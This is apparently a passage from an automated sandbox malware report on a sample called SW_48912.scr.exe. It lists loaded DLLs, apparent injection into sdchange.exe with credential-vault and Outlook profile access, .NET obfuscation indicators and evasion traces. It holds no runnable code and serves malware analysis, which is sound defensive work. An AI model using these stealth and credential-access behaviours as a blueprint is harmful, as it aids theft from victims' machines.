                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SW_48912.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SW_48912.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SW_48912.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sdchange.pdbGCTL source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kygSlzwdnMXWUy.exe, 00000009.00000000.1963179384.000000000070E000.00000002.00000001.01000000.0000000D.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3538501337.000000000070E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_48912.scr.exe, SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdchange.pdb source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | .Net Code: bRKiWHK7WF System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | .Net Code: bRKiWHK7WF System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 0_2_06674902 push eax; ret 0_2_06674909
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 0_2_06674900 pushad ; ret 0_2_06674901
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 0_2_06B846A6 pushfd ; ret 0_2_06B846A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0041185B push cs; ret 5_2_004118E4
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_004120DF push edx; iretd 5_2_004120F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_004120E3 push edx; iretd 5_2_004120F7
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_004118BC push cs; ret 5_2_004118E4
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00418100 push 00000000h; ret 5_2_00418107
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_004141B7 pushad ; iretd 5_2_004141B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00403310 push eax; ret 5_2_00403312
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00406557 push ebp; retf 5_2_00406559
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0040A523 push edi; ret 5_2_0040A52D
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00416DF8 push es; ret 5_2_00416E01
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00418D94 push cs; iretd 5_2_00418D95
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_00423673 push edi; iretd 5_2_0042367C
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0041A7E7 push edx; retf 5_2_0041A7EA
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013B225F pushad ; ret 5_2_013B27F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013B27FA pushad ; ret 5_2_013B27F9
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E09AD push ecx; mov dword ptr [esp], ecx 5_2_013E09B6
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013B283D push eax; iretd 5_2_013B2858
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013B1344 push eax; iretd 5_2_013B1369
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046627FA pushad ; ret 10_2_046627F9
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0466225F pushad ; ret 10_2_046627F9
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0466283D push eax; iretd 10_2_04662858
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_046909AD push ecx; mov dword ptr [esp], ecx 10_2_046909B6
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0466135E push eax; iretd 10_2_04661369
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_02720360 push edi; iretd 10_2_02720369
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0272035D push edi; iretd 10_2_02720369
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270E548 push cs; ret 10_2_0270E5D1
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_0270E5A9 push cs; ret 10_2_0270E5D1
                Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 10_2_02714DED push 00000000h; ret 10_2_02714DF4
                Source: SW_48912.scr.exe | Static PE information: section name: .text entropy: 7.785959501296895
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, r9j0NhBG7VqKxGXCdS.cs | High entropy of concatenated method names: 'ILJXgCYsC3', 'KeAXKiaWRD', 'aJFXWu6lmb', 'fCDXmCOvHA', 'WygXkeEYpp', 'lR6XYJsGBd', 'WL4Xdfmt08', 'mrcX62oId2', 'mREXCkpQyV', 'wHAXPYY6yB'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, UiyJH6SvVYbQ0dGbb2.cs | High entropy of concatenated method names: 'T2dZxhOnAm', 'cZZZpTUN0D', 'fnOZJ7ZP0F', 'C8oZFbIKSG', 'pbyZvLoBk4', 'lwkZE6fKAj', 'dEyZR7wFv5', 'Qj0Z7xeBUw', 'MXmZBdj4j2', 'JkPZc149E1'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, n9y3C8oW1f1VmVSpTJ.cs | High entropy of concatenated method names: 'vJ8W8w5rc', 'yDYmR1Kqr', 'LBtYoXVZO', 'dLxdyD89n', 'OIBCHmwcC', 'hD7PiMJ39', 'MS9PyyK1y2pRMI8A5y', 'OhC2cekGu0WEfAKk31', 'LIcQmyfIB', 'poGTkBkmw'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, ix1KuNDjeYkrDHmaNB.cs | High entropy of concatenated method names: 'AqufuYgQHa', 'TR7fjh1KCf', 'ToString', 'zSsfL0Pahw', 'qNFfaijCjF', 'E6Af8ldcZm', 'vwlfyOsNKN', 'qumfHcYbsa', 'KlvfXneQUw', 'Oy8fA47mbA'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | High entropy of concatenated method names: 'RbAUMBsbHh', 'jKRULYHmHB', 'J3GUaxp0l1', 'K0SU87s07C', 'vZTUygYq4g', 'iK5UHIAnNS', 'f0hUXNkrrN', 'yJZUAifWVH', 'MQ5U5JVvbW', 'xg0UurKomU'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, QM3KVliEY4gN7aP3Ii.cs | High entropy of concatenated method names: 'ihu4X94X3h', 'jj54ALqJ81', 'dlO4ueAfgd', 'mYJ4jicbcL', 'jat41RWyQD', 'H6u4rx5uHW', 'KlX8AGJKrAEwqZiWo0', 'wBKGpA5PDVfgvvHrXs', 'WvC44T25yK', 'YTb4UMFIrv'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, mXhVcrzAahkX4e1o6e.cs | High entropy of concatenated method names: 'qG8TYCIkAI', 'd3lT6AvriN', 'aivTCMTRf2', 'uhWTxyUEUS', 'UaITp6GSqc', 'LPiTFHostR', 'p7vTvpWPbZ', 'q9ZTG2xQ6T', 'lwfTgmyAuW', 'LwnTKVQvgh'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, JZQbrfRNmtXNOmHYD5.cs | High entropy of concatenated method names: 'X5dXLZYoUV', 'FQyX8uSrXx', 'KgvXHlCVFN', 'tpSHwukD6c', 'R1MHzqb62C', 'iHyXbGYcuq', 'kLSX4aVJ9V', 'T8rXoxMe9l', 'sBnXUbNCQT', 'CX3Xi9POLB'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, qWFQwglLpPhAuvpMU4.cs | High entropy of concatenated method names: 'FUa1clNQil', 'JJe13xdVf7', 'kjw1latO5I', 'vVj1q3dKho', 'bWK1pXrDSD', 'ktY1Je3AA9', 'HFl1F44U4h', 'rjw1vv2SmQ', 'YkC1EHYchI', 'l3r1RT7ad0'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, iVXIBw4inrWlaNUiWD5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BduIZkdjZC', 'ET7ITDr0SZ', 'zfLIhUvSP8', 'hWnII2H9QY', 'rBuI0yPRub', 'vO6I2LfShs', 'Mj0IGE0Dow'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, aKG09444XxmTvLhxHg5.cs | High entropy of concatenated method names: 'zrxTwD7vIy', 'cWcTzGnGrk', 'WtThbnO3KC', 'WXAh4ZxELB', 'ePlhoG5FlB', 'cwRhUTmoQV', 'He0hixWZlx', 'KD6hMWVp3n', 'gIchLkv2h8', 'hashaBvp48'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, m94X3h6Xj5LqJ81Tpq.cs | High entropy of concatenated method names: 'ceealjTRiD', 'A5paqKvBYV', 'kXDaVXi7O3', 'gj5aDS8rjJ', 'PEeanF7tHo', 'WKHasFTcrY', 'dfwatQiqsw', 'oN3a9ADFPR', 'd8maSlBayR', 'RYYawtRVDd'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, qOTDadsiHR5BK2xURX.cs | High entropy of concatenated method names: 'mOQf9FV25G', 'oMgfwWDhcj', 'lITQbWX0mO', 'wEpQ4tPiXw', 'CUDfNI1PgK', 'jFHf3s4wx6', 'RvxfevrucW', 'BdhflXLvPr', 'ew5fqsVySH', 'uAifVeFlOA'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, CiOdRiClOeAfgdjYJi.cs | High entropy of concatenated method names: 'uMm8m1v0CK', 'dY58YBSHaK', 'I2f86Xq9lL', 'CfR8C5UCtK', 'PIe81SLWjc', 'goA8rL2ZJV', 'd8v8fbxe9Q', 'WOW8QdODdy', 'YEv8ZbbbyF', 'aZS8T5ZO0L'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, NbcLSmPLGpctpXatRW.cs | High entropy of concatenated method names: 'qo5ykguZKh', 'k77ydb9AXV', 'HZh8J1qgFv', 'Ld28FPS5vs', 'v1S8vQKTZL', 'lJs8EPhJNY', 'wcB8RjNeC4', 'Wia87hxVsZ', 'zmq8BrISx9', 'SV78cNCMqv'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, AUVf05wvGYk17tuTaf.cs | High entropy of concatenated method names: 'u75T8Bdi6C', 'RakTy7QuMg', 'v0uTHO9odD', 'LJ7TXxdKmu', 'FBoTZkXEcY', 'WudTAlkWSQ', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, kETZ0xat9xhtwhakBX.cs | High entropy of concatenated method names: 'Dispose', 'eTu4SSLhyM', 'WHvopvwUbM', 'sZpqvPRssW', 'F8T4wBsTQZ', 'rGm4zJT4sH', 'ProcessDialogKey', 'O3nobiyJH6', 'JVYo4bQ0dG', 'ab2ookUVf0'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, brOdrNtVbMTuSLhyMP.cs | High entropy of concatenated method names: 'BFkZ12vnM4', 'HfhZfVMQgM', 'dAfZZFPIFW', 'wKaZhmEYaq', 'MIKZ0MQLPb', 'OJ3ZG7ctoj', 'Dispose', 'OxoQLa7oFm', 'lu1Qa41iqK', 'kO1Q8Ftmml'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, hQDJ6uxx5uHWEQO5CH.cs | High entropy of concatenated method names: 'KQqHMsb1c5', 'J42HanoYZ7', 'AxxHyOynSc', 'sMiHXD2wFh', 'hwaHACyGAe', 'zDHynO9ghA', 'DxFyskndjF', 'YsWyt7SGfv', 'TcNy9A2crO', 'fWJySQ7rGp'
                Source: 0.2.SW_48912.scr.exe.6ba0000.3.raw.unpack, Poh9fae0KkTkb0mvJP.cs | High entropy of concatenated method names: 'u5MO6fHBEu', 'gIwOCuBs85', 'D7OOxgsfia', 'BJqOp5xZui', 'i6UOF5nDe2', 'db1OvYsUGO', 'zPNORM0bqU', 'Q2UO7EPCd6', 'hlNOcjb72C', 'IxBON8FHIs'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, r9j0NhBG7VqKxGXCdS.cs | High entropy of concatenated method names: 'ILJXgCYsC3', 'KeAXKiaWRD', 'aJFXWu6lmb', 'fCDXmCOvHA', 'WygXkeEYpp', 'lR6XYJsGBd', 'WL4Xdfmt08', 'mrcX62oId2', 'mREXCkpQyV', 'wHAXPYY6yB'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, UiyJH6SvVYbQ0dGbb2.cs | High entropy of concatenated method names: 'T2dZxhOnAm', 'cZZZpTUN0D', 'fnOZJ7ZP0F', 'C8oZFbIKSG', 'pbyZvLoBk4', 'lwkZE6fKAj', 'dEyZR7wFv5', 'Qj0Z7xeBUw', 'MXmZBdj4j2', 'JkPZc149E1'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, n9y3C8oW1f1VmVSpTJ.cs | High entropy of concatenated method names: 'vJ8W8w5rc', 'yDYmR1Kqr', 'LBtYoXVZO', 'dLxdyD89n', 'OIBCHmwcC', 'hD7PiMJ39', 'MS9PyyK1y2pRMI8A5y', 'OhC2cekGu0WEfAKk31', 'LIcQmyfIB', 'poGTkBkmw'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, ix1KuNDjeYkrDHmaNB.cs | High entropy of concatenated method names: 'AqufuYgQHa', 'TR7fjh1KCf', 'ToString', 'zSsfL0Pahw', 'qNFfaijCjF', 'E6Af8ldcZm', 'vwlfyOsNKN', 'qumfHcYbsa', 'KlvfXneQUw', 'Oy8fA47mbA'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, oiTVwJAvTb3AhAW3OM.cs | High entropy of concatenated method names: 'RbAUMBsbHh', 'jKRULYHmHB', 'J3GUaxp0l1', 'K0SU87s07C', 'vZTUygYq4g', 'iK5UHIAnNS', 'f0hUXNkrrN', 'yJZUAifWVH', 'MQ5U5JVvbW', 'xg0UurKomU'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, QM3KVliEY4gN7aP3Ii.cs | High entropy of concatenated method names: 'ihu4X94X3h', 'jj54ALqJ81', 'dlO4ueAfgd', 'mYJ4jicbcL', 'jat41RWyQD', 'H6u4rx5uHW', 'KlX8AGJKrAEwqZiWo0', 'wBKGpA5PDVfgvvHrXs', 'WvC44T25yK', 'YTb4UMFIrv'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, mXhVcrzAahkX4e1o6e.cs | High entropy of concatenated method names: 'qG8TYCIkAI', 'd3lT6AvriN', 'aivTCMTRf2', 'uhWTxyUEUS', 'UaITp6GSqc', 'LPiTFHostR', 'p7vTvpWPbZ', 'q9ZTG2xQ6T', 'lwfTgmyAuW', 'LwnTKVQvgh'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, JZQbrfRNmtXNOmHYD5.cs | High entropy of concatenated method names: 'X5dXLZYoUV', 'FQyX8uSrXx', 'KgvXHlCVFN', 'tpSHwukD6c', 'R1MHzqb62C', 'iHyXbGYcuq', 'kLSX4aVJ9V', 'T8rXoxMe9l', 'sBnXUbNCQT', 'CX3Xi9POLB'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, qWFQwglLpPhAuvpMU4.cs | High entropy of concatenated method names: 'FUa1clNQil', 'JJe13xdVf7', 'kjw1latO5I', 'vVj1q3dKho', 'bWK1pXrDSD', 'ktY1Je3AA9', 'HFl1F44U4h', 'rjw1vv2SmQ', 'YkC1EHYchI', 'l3r1RT7ad0'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, iVXIBw4inrWlaNUiWD5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BduIZkdjZC', 'ET7ITDr0SZ', 'zfLIhUvSP8', 'hWnII2H9QY', 'rBuI0yPRub', 'vO6I2LfShs', 'Mj0IGE0Dow'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, aKG09444XxmTvLhxHg5.cs | High entropy of concatenated method names: 'zrxTwD7vIy', 'cWcTzGnGrk', 'WtThbnO3KC', 'WXAh4ZxELB', 'ePlhoG5FlB', 'cwRhUTmoQV', 'He0hixWZlx', 'KD6hMWVp3n', 'gIchLkv2h8', 'hashaBvp48'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, m94X3h6Xj5LqJ81Tpq.cs | High entropy of concatenated method names: 'ceealjTRiD', 'A5paqKvBYV', 'kXDaVXi7O3', 'gj5aDS8rjJ', 'PEeanF7tHo', 'WKHasFTcrY', 'dfwatQiqsw', 'oN3a9ADFPR', 'd8maSlBayR', 'RYYawtRVDd'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, qOTDadsiHR5BK2xURX.cs | High entropy of concatenated method names: 'mOQf9FV25G', 'oMgfwWDhcj', 'lITQbWX0mO', 'wEpQ4tPiXw', 'CUDfNI1PgK', 'jFHf3s4wx6', 'RvxfevrucW', 'BdhflXLvPr', 'ew5fqsVySH', 'uAifVeFlOA'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, CiOdRiClOeAfgdjYJi.cs | High entropy of concatenated method names: 'uMm8m1v0CK', 'dY58YBSHaK', 'I2f86Xq9lL', 'CfR8C5UCtK', 'PIe81SLWjc', 'goA8rL2ZJV', 'd8v8fbxe9Q', 'WOW8QdODdy', 'YEv8ZbbbyF', 'aZS8T5ZO0L'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, NbcLSmPLGpctpXatRW.cs | High entropy of concatenated method names: 'qo5ykguZKh', 'k77ydb9AXV', 'HZh8J1qgFv', 'Ld28FPS5vs', 'v1S8vQKTZL', 'lJs8EPhJNY', 'wcB8RjNeC4', 'Wia87hxVsZ', 'zmq8BrISx9', 'SV78cNCMqv'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, AUVf05wvGYk17tuTaf.cs | High entropy of concatenated method names: 'u75T8Bdi6C', 'RakTy7QuMg', 'v0uTHO9odD', 'LJ7TXxdKmu', 'FBoTZkXEcY', 'WudTAlkWSQ', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, kETZ0xat9xhtwhakBX.cs | High entropy of concatenated method names: 'Dispose', 'eTu4SSLhyM', 'WHvopvwUbM', 'sZpqvPRssW', 'F8T4wBsTQZ', 'rGm4zJT4sH', 'ProcessDialogKey', 'O3nobiyJH6', 'JVYo4bQ0dG', 'ab2ookUVf0'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, brOdrNtVbMTuSLhyMP.cs | High entropy of concatenated method names: 'BFkZ12vnM4', 'HfhZfVMQgM', 'dAfZZFPIFW', 'wKaZhmEYaq', 'MIKZ0MQLPb', 'OJ3ZG7ctoj', 'Dispose', 'OxoQLa7oFm', 'lu1Qa41iqK', 'kO1Q8Ftmml'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, hQDJ6uxx5uHWEQO5CH.cs | High entropy of concatenated method names: 'KQqHMsb1c5', 'J42HanoYZ7', 'AxxHyOynSc', 'sMiHXD2wFh', 'hwaHACyGAe', 'zDHynO9ghA', 'DxFyskndjF', 'YsWyt7SGfv', 'TcNy9A2crO', 'fWJySQ7rGp'
                Source: 0.2.SW_48912.scr.exe.3606898.1.raw.unpack, Poh9fae0KkTkb0mvJP.cs | High entropy of concatenated method names: 'u5MO6fHBEu', 'gIwOCuBs85', 'D7OOxgsfia', 'BJqOp5xZui', 'i6UOF5nDe2', 'db1OvYsUGO', 'zPNORM0bqU', 'Q2UO7EPCd6', 'hlNOcjb72C', 'IxBON8FHIs'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX (101 identical events)
                Source: C:\Windows\SysWOW64\sdchange.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical events)

                Malware Analysis System Evasion

                Source: Yara match - File source: Process Memory Space: SW_48912.scr.exe PID: 7084, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\sdchange.exe - API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 2390000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 2530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 4530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 8710000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 6D70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SW_48912.scr.exe - Memory allocated: 9710000 memory reserve | memory write watch
